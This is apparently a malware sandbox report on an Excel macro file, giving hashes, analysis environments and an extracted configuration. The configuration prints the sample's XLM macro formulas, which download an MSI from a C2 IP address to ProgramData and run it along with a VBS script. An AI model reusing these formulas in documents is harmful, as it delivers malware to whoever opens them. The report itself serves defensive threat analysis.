51141e0563b4bafc369d627897806c2f | Triage

Submit
Reports

Overview

overview

Static

static

51141e0563...f.xlsm

windows7-x64

51141e0563...f.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

51141e0563b4bafc369d627897806c2f.xlsm

Resource

win7-20231215-en

windows7-x64

8 signatures

150 seconds

Behavioral task

behavioral2

Sample

51141e0563b4bafc369d627897806c2f.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

6 signatures

150 seconds

General

Target

51141e0563b4bafc369d627897806c2f
Size

6KB
MD5

51141e0563b4bafc369d627897806c2f
SHA1

ea182ecdf5a0e24a7fd13b0fc0548c83b87745c5
SHA256

13fb809a13c2c1ded1ae4851bc773eefc8b39e5f47461565caa7113a2cb5a844
SHA512

e69f4895c9be4ee9f5c15df72ea64a4615f2c6c6bffcd979a2c9120e3ff4a3b363a7cd9b487e8ab16a96c122db3df5bf2e065434c622c9510fd53d8e16992a8d
SSDEEP

192:ESSLuSWC1aVPmmfRL8UhHFBFYBBE98ywV6STn:Eru7191FYnE98yJyn

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187

Attributes

formulas
=EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()

Signatures

Files

51141e0563b4bafc369d627897806c2f
.xlsm office2007

© 2018-2025

Terms | Privacy